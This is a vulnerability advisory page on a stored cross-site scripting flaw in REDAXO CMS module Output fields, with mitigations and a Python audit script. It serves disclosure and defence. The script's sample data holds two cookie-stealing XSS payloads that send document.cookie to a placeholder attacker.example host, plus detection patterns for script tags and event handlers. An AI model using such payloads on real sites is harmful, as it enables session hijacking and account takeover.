REDAXO CMS, Stored Cross-Site Scripting, CVE-2025-53033 (Moderate)


CVE-2025-53033 is a stored cross-site scripting flaw in the "Output" code field of REDAXO CMS's module management. That field is where developers enter the HTML/PHP code a module renders on the frontend. The application does not escape or sanitize this user-controllable input before storing it, so a remote, authenticated user with module editing permissions can place a JavaScript payload directly in the Output field. The vulnerability is "stored" because the payload is saved with the module's configuration in the database. It triggers when any other user, such as an editor or administrator, opens a backend page that uses a "slice" based on the compromised module. When that slice is viewed or edited, the script is rendered and executed in the victim's browser within the security context of their REDAXO backend session.
Platform: REDAXO CMS
Version: 5.20.0
Vulnerability: Stored XSS
Severity: Moderate
Date: 2025-11-25

Prediction: patch expected 2025-12-02

What Undercode Says:

`curl -s https://www.redaxo.org/api/security/ | jq ‘.’`

`grep -r “output.field” redaxo/modules/`

`echo “Alert: Check module code for unsanitized echo statements”`

How the Exploit Works:

An attacker with module editing rights stores a JavaScript payload (for example a `<script>` block or an event-handler attribute on an HTML tag) in the module's Output code field. The payload is persisted with the module and executes when an administrator views any backend page that uses a slice from the tampered module, potentially hijacking the admin session.

Protection from this CVE

Update REDAXO CMS as soon as a release that addresses CVE-2025-53033 is available.

Sanitize module output: audit stored module Output code for script tags, event handlers and `javascript:` URIs that nobody on the team added.

Implement a Content Security Policy for the backend so that inline scripts are not executed even if one is stored.

Escape module code whenever it is displayed in backend views, rather than inserting it into the page as raw HTML.

Apply the principle of least privilege: grant module editing rights only to trusted developer accounts, not to ordinary editors.
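The following Python script is an added example written for this page; it is not REDAXO's own code and not part of the original advisory. It ties together the audit commands, the exploit description and the protection list: it scans stored module Output code for script-like content (the check the `grep` one-liner only approximates), then shows the flawed rendering described in the advisory next to an escaped variant that turns the same payload into inert text. The module records, the `attacker.example` host and the function names are constructed for the example; the records only mimic the id/name/output shape of REDAXO's module table, and `REX_VALUE[1]` / `REX_MEDIA[1]` are REDAXO's own placeholder syntax used to make the benign modules look realistic.

```python
"""Audit REDAXO module Output code for injected JavaScript and show how
escaping neutralises it in backend views.

Added example, not REDAXO's own code.  The module records below are
constructed to look like rows of the module table (id, name, output);
the column names and all function names are assumptions.
"""
import html
import re
from dataclasses import dataclass

# Patterns that indicate active script content inside markup.  Each one is
# anchored on a raw '<' so that HTML-escaped text ('&lt;script') no longer
# matches.  A legitimate frontend module may itself ship a <script> block,
# so hits are leads for manual review, not proof of compromise.
SUSPICIOUS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "event_handler": re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE),
    "javascript_uri": re.compile(r"<[^>]*javascript\s*:", re.IGNORECASE),
}


@dataclass
class Module:
    id: int
    name: str
    output: str


# Constructed sample data (not taken from any real installation).
# Modules 3 and 4 carry the kind of payload the advisory describes; the
# exfiltration host attacker.example is a placeholder.
SAMPLE_MODULES = [
    Module(1, "Text block", '<div class="text">REX_VALUE[1]</div>'),
    Module(2, "Hero", '<h1>REX_VALUE[1]</h1>\n<img src="REX_MEDIA[1]" alt="">'),
    Module(3, "Text block (tampered)",
           '<div class="text">REX_VALUE[1]</div>\n'
           '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'),
    Module(4, "Gallery (tampered)",
           '<img src="x" onerror="new Image().src='
           '\'https://attacker.example/\' + document.cookie">'),
]


def find_suspicious_modules(modules):
    """Return {module_id: [pattern names]} for every module whose Output
    code contains script-like content."""
    findings = {}
    for m in modules:
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(m.output)]
        if hits:
            findings[m.id] = hits
    return findings


def render_output_field_vulnerable(output_code):
    """The flawed behaviour the advisory describes: stored Output code is
    dropped into backend markup as-is, so a <script> inside it runs in the
    editor's or admin's session."""
    return f'<div class="module-output">{output_code}</div>'


def render_output_field_escaped(output_code):
    """Hardened variant: HTML-escape the stored code before inserting it
    into backend markup, so the browser shows it as text and executes
    nothing.  html.escape with quote=True also neutralises attribute
    breakouts; REDAXO's rex_escape() helper serves the same purpose
    (assumed to be the idiomatic choice in REDAXO code)."""
    return f'<pre class="module-output">{html.escape(output_code, quote=True)}</pre>'


def contains_active_script(markup):
    """True if rendered markup still contains something a browser would run."""
    return any(rx.search(markup) for rx in SUSPICIOUS_PATTERNS.values())


if __name__ == "__main__":
    for module_id, hits in find_suspicious_modules(SAMPLE_MODULES).items():
        print(f"module {module_id}: review needed ({', '.join(hits)})")
    tampered = SAMPLE_MODULES[2].output
    print("vulnerable render executes script:",
          contains_active_script(render_output_field_vulnerable(tampered)))
    print("escaped render executes script:   ",
          contains_active_script(render_output_field_escaped(tampered)))
```

Run it against a dump of your own module table by replacing `SAMPLE_MODULES` with the real rows; treat every hit as something to diff against the module's known-good version in source control, since frontend modules can legitimately contain scripts. Note that escaping only protects the backend display of the code; the Output field is still executed as PHP/HTML on the frontend by design, which is why restricting who may edit modules matters as much as the escaping fix.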

Impact:

Backend session hijacking.

Unauthorized admin actions.

Data theft from backend.

Account compromise.

Sources:

Reported By: github.com
